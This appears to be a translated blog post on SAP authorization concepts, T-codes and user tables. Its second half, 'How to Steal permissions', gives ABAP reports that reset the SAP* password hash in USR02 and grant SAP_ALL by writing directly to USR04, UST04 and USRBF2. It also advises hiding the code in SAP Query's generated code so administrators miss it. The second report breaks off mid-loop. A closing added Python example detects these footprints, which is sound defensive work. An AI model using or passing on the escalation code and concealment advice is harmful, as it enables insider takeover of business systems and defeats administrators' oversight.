SAP User Rights Anatomy, Explained in Detail


"IT168 informatization"

Basis administrators generally use PFCG for authorization management, and when you save a role the system generates a profile name.
Remember that SU01 shows two fields for a user, Profile and Role? What is the relationship between them?

First, a few concepts.

1. Activity

Let's start with activity. What does activity mean? Look it up:
the dictionary says it specifies which actions you may perform, for example no smoking, only drinking, and not out past 22:00.
No, that is what my wife says. SAP is not like that; an activity is only Insert, Update, Display and the like.
The Germans wrote these into table TOBJ.
Activities can also be grouped into activity groups.

2. Activity Category & Authorization Group

Role vs. Profile

If you look at table T020 you will see what K, D, A, M and so on mean.

What is a profile? It can be understood as the complete set of authorization data: many authorization groups (which you can maintain with OBA7;
authorizations sliced too thin are not a good thing ^_^) plus activities, collected under one name. Usually a custom role generates
a PROFILE, and SAP authorization control is based on the authorization data (objects) in the profile.

What is a role? A role is just a name to which a profile is attached. For example, if you create a user in SU01
with no role at all but add the SAP_ALL profile,
it can do anything.
SAP itself ships with many default roles and profiles.

3. The most commonly used: PFCG

-> Authorizations -> Change Authorization Data ->
After entering, choose Selection Criteria to see all authorization objects.
You can add an authorization object manually: for example, when a T-code fails with an authorization error, use SU53 (in ABAP) to
find out which authorization object is missing, then add it by hand.
Choosing authorization levels lets you subdivide the permissions by account type.
Some even go down to a single table field, and an object can even be assigned to a buffer.

So how does SAP actually enforce authorizations? Like a butcher reaching for his knife, even for a small slaughter.

4. Several authorization-related T-codes

(i) Role-related T-codes:

PFAC: standard
PFAC_DEL: delete
PFAC_DIS: display
PFAC_INS: new
PFCG: create
ROLE_CMP: comparison
SUPC: mass generation of role profiles
SWUJ: test
SU03: check authorization data
SU25, SU26: check updated profiles

(ii) User-related T-codes:

SU50, SU51, SU52
SU10: mass changes
SU12: mass processing
SUCOMP: maintain user company address
SU2: change user parameters
SUIM: User Information System
User groups:
SUGR: maintenance
SUGRD_NAV, SUGR_NAV: navigation variants for maintenance and display

(iii) Profile & authorization data

SU02: create a profile directly, without a role
SU20: subdivide authorization fields

SU21 (SU03): ***** maintain authorization objects (TOBJ, USR12).
For accounting documents you can subdivide into:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW: Accounting Document: Change Default Values for Doc.Type/PstKy
Drill into one and you can subdivide further; these values are saved in table USR12. The DB layer is UTAB.

For subdividing by specific transaction code:
SU53: *** when you get an authorization error, shows which authorization objects you were missing.
SU56: analyze authorization data buffers.
SU87: check the history generated by user changes.
SU96, SU97, SU98, SU99: what are you doing?
SUPC: mass generation of roles

DB and logical layers:
SUKRI: transaction combinations critical for security
TOBJ: all available authorization objects (everything is here)
USR12: user-level authorization values
USR01: master data
USR02: the password is here
USR04: authorizations
USR03: user address data
USR05: user master parameter IDs
USR06: additional data per user
USR07: object/values of authorization checks that failed
USR08: table for user menu entries
USR09: entries for user menus (work areas)
USR10: user master authorization profiles
USR11: user master texts for profiles (USR10)
USR12: user master authorization values
USR13: short texts for authorizations
USR14: surchargeable language versions per user
USR15: external user name
USR16: values for variables for user authorizations
USR20: date of last user master reorganization
USR21: assignment of user name to address key
USR22: logon data without kernel access
USR30: additional information for user menu
USR40: table of illegal passwords
USR41: current user
UST04: user profiles are here
UST10C: composite profiles
UST10S: single profiles (corresponding to roles)

How to Steal permissions


User types:
The usual user types are
A. Dialog (normal user)

Usually you need an authorization check before any T-code can be used.

AUTHORITY_CHECK: this function is only a small check of whether your user exists and when it expires.
** In coding, using only this function is enough.
AUTHORITY_CHECK_TCODE: checks the T-code.

This Z function actually checks the authorization objects.

AUTHORIZATION_DATA_READ_SELOBJ:

The program that changes the sap* password to 123 is very simple.
We found the user logon table, USR02.

(DF52478E6FF90EEB is what SAP's password encryption stores in the DB; what is SAP's password encryption?)
Report zmodsap*:

```abap
data zUSR02 like USR02.
select single * into zUSR02 from USR02
  where bname = 'sap*'.
zusr02-bcode = 'Df52478e6ff90eeb'.
update USR02 from zUSR02.
```

Now the question is how to keep your Basis team from noticing. Very simple: hide the code in a query. When you build a
Query, SAP generates code for it; you add yours there. Who would ever think of that??? Then wait for your Basis admin to cry...

That is too vicious. Or quietly work on your own user.
Either way you have to be very clear about the authorization structure here.
Permissions involve three tables.

c. USRBF2: this table holds the authorization objects actually used.

```abap
*&---------------------------------------------------------------------*
*& Report: steal SAP all rights
*& Creation date: 2004.04.01
*& Created by: Stone.Fu
*& Description: can steal SAP_ALL permissions
*& Modified date: 2005.11.02
*& Description: hide this code in the query's generated code
*&---------------------------------------------------------------------*

data zUSR04 like USR04.                        " work area
data zUST04 like USR04.
data zprofs like Usr04-profs.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
                                               " USRBF2 internal table
** Update authorization table USR04.
select single * into zUSR04 from USR04
  where bname = 'ZABC2'.
move 'C sap_all' to zprofs.                    " SAP_ALL permissions
zusr04-nrpro = '14'.
zusr04-profs = zprofs.
update USR04 from zUSR04.

** Update user authorization master table UST04.
select single * into zUST04 from UST04
  where bname = 'ZABC2'.
zust04-profile = 'Sap_all'.                    " SAP_ALL permissions
update UST04 from zUST04.

* Insert instead of update
*zust04-mandt = '200'.
*zust04-bname = 'ZABC2'.
*zust04-profile = 'Sap_all'.
*insert UST04 from ZUST04.

select * from USRBF2 into table ZUSRBF2
  where bname = 'sap*'.
loop at ZUSRBF2.
  zusrbf2-bname = 'ZABC2'.
  modify ZUSRBF2 index sy-tabix transporting bname.
```

Create a user ZTEST without any permissions, then run report ZRIGHTSTEAL on a test machine.

Afterwards ZTEST has SAP_ALL. Then hide the code inside SAP Query's generated code; plain ABAP code is too easy to find.
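The defender's side of the three tables above, as an added example that is not from the original post: offline checks over constructed USR04, UST04 and USRBF2 extracts that flag exactly the footprints a direct table write like this report leaves behind (SAP_ALL assigned outside role administration, a USR04 profile count that no longer matches UST04, and a USRBF2 buffer identical to SAP*'s). Field names are the real SAP ones; the rows, user names and the approved list are constructed.

```python
# Added example, not from the original post: offline checks over constructed
# extracts of the three tables the report touches (USR04, UST04, USRBF2) that
# flag the footprints a direct table write leaves behind. Field names BNAME,
# NRPRO, PROFS, PROFILE, OBJCT and AUTH are the real SAP ones; all rows are
# constructed sample data, not taken from any system.

# USR04: user master authorization profiles (NRPRO = profile count, PROFS = list)
USR04 = {
    "SAP*":  {"nrpro": 1,  "profs": ["SAP_ALL"]},
    "ZABC2": {"nrpro": 14, "profs": ["SAP_ALL"]},     # hand-written, count is wrong
    "JDOE":  {"nrpro": 1,  "profs": ["T-AB000001"]},  # role-generated (constructed)
}
# UST04: one row per user/profile assignment
UST04 = [("SAP*", "SAP_ALL"), ("ZABC2", "SAP_ALL"), ("JDOE", "T-AB000001")]
# USRBF2: per-user authorization buffer, one row per (object, authorization)
USRBF2 = [
    ("SAP*", "S_TCODE", "&_SAP_ALL"), ("SAP*", "S_USER_GRP", "&_SAP_ALL"),
    ("ZABC2", "S_TCODE", "&_SAP_ALL"), ("ZABC2", "S_USER_GRP", "&_SAP_ALL"),
    ("JDOE", "S_TCODE", "T-AB00000100"),
]

def unexpected_sap_all(ust04, allowed=frozenset({"SAP*", "DDIC"})):
    """Users holding SAP_ALL in UST04 who are not on the approved list."""
    return sorted({u for u, p in ust04 if p == "SAP_ALL" and u not in allowed})

def profile_count_mismatch(usr04, ust04):
    """Users whose USR04 NRPRO/PROFS disagree with their UST04 rows; SU01 and
    PFCG keep the two tables in step, a manual UPDATE usually does not."""
    by_user = {}
    for u, p in ust04:
        by_user.setdefault(u, set()).add(p)
    return sorted(u for u, r in usr04.items()
                  if r["nrpro"] != len(by_user.get(u, set()))
                  or set(r["profs"]) != by_user.get(u, set()))

def cloned_buffer(usrbf2, template="SAP*"):
    """Users whose USRBF2 (OBJCT, AUTH) set is identical to the template user's,
    the footprint of copying SAP*'s buffer rows under another BNAME."""
    rows = {}
    for u, o, a in usrbf2:
        rows.setdefault(u, set()).add((o, a))
    ref = rows.get(template, set())
    return sorted(u for u, s in rows.items() if u != template and s == ref)

if __name__ == "__main__":
    print("SAP_ALL outside approved list:", unexpected_sap_all(UST04))
    print("USR04/UST04 out of step:", profile_count_mismatch(USR04, UST04))
    print("USRBF2 cloned from SAP*:", cloned_buffer(USRBF2))
```

On a real system the three extracts would come from SE16 downloads or a scheduled job, and a hit on any of the three checks is worth comparing against the change documents SU87 shows for that user.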
